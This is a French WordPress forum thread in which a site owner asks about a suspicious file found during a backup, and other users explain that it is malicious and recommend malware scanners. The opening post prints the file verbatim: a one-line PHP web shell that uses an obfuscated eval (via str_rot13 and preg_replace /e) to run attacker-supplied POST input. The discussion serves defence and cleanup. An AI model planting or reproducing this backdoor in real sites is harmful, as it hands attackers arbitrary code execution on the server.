Nouveau fichier suspect (Créer un compte)

  • Statut : non résolu
11 sujets de 1 à 11 (sur un total de 11)
  • Auteur
    Messages
  • #557015
    blablabla
    Participant
    Initié WordPress
    23 contributions

    Bonjour,
    en faisant un backup de mon site, je découvre un nouveau fichier signalé suspect par Sucuri Security.

    Le fichier est : wp-includes/bjd.php

    et voici ce qu’il contient :

    <?php if($_GET['test']){echo 'success';}else{($www= $_POST['dak']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

    Qu’est ce que ce fichier et code font ?
    Est ce un code malveillant ou bien je dois conserver cela ?
    Merci pour vos aides.

    Version WP 4.3.1
    tous les plugins et thèmes à jour.

    #1030773
    cavo789
    Participant
    Padawan WordPress
    67 contributions

    Bonjour

    str_rot13(‘riny’) correspond à la chaîne eval(). preg_replace /e permet quand à lui l’exécution d’un code qui est passé comme chaîne de caractères. Le eval() est donc exécuté.

    $www est la variable évaluée et elle est initialisée par le $_POST

    Et donc, en gros : un hackeur fait ce qu’il veut sur ton site. Il va poster une instruction php / système qui sera lue et exécutée par ce petit bout de code.

    Un conseil : nettoie ton site parce que si tu as un fichier vérolé; attends toi à en avoir bien, bien plus.

    Bonne journée.

    #1030774
    blablabla
    Participant
    Initié WordPress
    23 contributions

    Merci pour ces infos rapides !

    Je vais rapidement tout supprimer.

    Mais pour chercher si il y a d’autres fichiers avec la même faille, qu’est ce que je peux essayer de chercher comme bout de code ?

    Y a t’il justement un astuce aussi pour chercher ça directement sur le serveur sans devoir tout télécharger ?
    Merci pour ton aide.

    #1030775
    cavo789
    Participant
    Padawan WordPress
    67 contributions

    Bonjour

    Je ne connais pas de scanner gratuit capable de détecter toutes les variantes possibles de virus. Pour cela, il faut un scanner puissant qui travaille en offline.

    En gratuit, teste toujours mon logiciel aeSecure QuickScan (deuxième lien dans ma signature) (compatible WP); il va débusquer certains virus sur ton site et là, il fonctionne online (sur le site de production).

    Le souci avec les virus, c’est leur polymorphisme; il y a une telle variétés de type d’obfuscation qu’il est compliqué de mettre toutes ces signatures-là dans un outil gratuit vu le temps de développement requis pour alimenter la base de données (et le logiciel de scan).

    Bonne journée.

    #1030776
    blablabla
    Participant
    Initié WordPress
    23 contributions

    effectivement, c’est ce que j’avais essayé et il a trouvé de nombreux fichiers suspects.

    Après c’est assez complexe à identifier les faux positifs, mais pour la rapidité d’utilisation de ce scan, c’est surement une bonne aide.

    Merci !

    #1030777
    cavo789
    Participant
    Padawan WordPress
    67 contributions

    Oui, en effet, l’utilisation d’un scanner met en évidence des fichiers potentiellement dangereux (p.ex. avec un eval(base64_decode(); reste que une telle signature n’est pas toujours synonyme de virus.

    A moins d’être face à un fichier; à l’octet près, déjà identifié comme malware; il n’est jamais certain d’être face à un code malfaisant et donc, oui, l’utilisateur doit faire un travail “Oui, c’est un virus”, “Non, c’est un code sain”.

    Pour QuickScan, l’objectif est surtout de répondre à la question : est-ce que mon site a été hacké ?

    Dans ton cas; oui, c’est le cas vu ton str_rot13(‘riny’). Il n’y a aucun doute possible là-dessus; il te faut donc le nettoyer en p.ex. remettant un backup sain par-dessus.

    Bonne fin de journée.

    #1030778
    Flobogo
    Modérateur
    Maître WordPress
    16256 contributions
    #1030779
    Dge-06
    Participant
    Initié WordPress
    33 contributions

    Peut-être que mon plugin peut vous intéresser : https://fr.wordpress.org/plugins/scan-upload-par-jm-crea/

    #1030780
    cavo789
    Participant
    Padawan WordPress
    67 contributions

    Bonjour Dge-06

    Je viens vite d’aller regarder le code source de ton plugin. En fait, c’est “juste” un “Dir” càd que tu vérifies l’extension du fichier et si c’est une de celle que tu as programmée, tu affiches le nom du fichier. Ai-je bien compris ? Si oui, c’est quand même très basique non ? Ce n’est pas un scan au niveau du contenu mais juste sur base de l’extension (ex : un virus avec une extension .jpg ne sera jamais détecté)

    Bonne journée.

    #1030781
    Dge-06
    Participant
    Initié WordPress
    33 contributions

    Non effectivement, ça ne va pas scanner le contenu du fichier, mais juste l’extension.

    Car bien souvent les hackers s’amusent à uploader des fichiers dans le dossier wp-upload.

    L’avantage de ce plugin c’est qu’il est rapide et trouve les fichiers suspects.

    Après si tu veux scanner en profondeur, il vaut mieux utiliser GOTMLS

    #1030782
    cavo789
    Participant
    Padawan WordPress
    67 contributions

    Sans nul doute, il doit en effet être très véloce.

    Bonne journée Dge-06

11 sujets de 1 à 11 (sur un total de 11)
  • Vous devez être connecté pour répondre à ce sujet.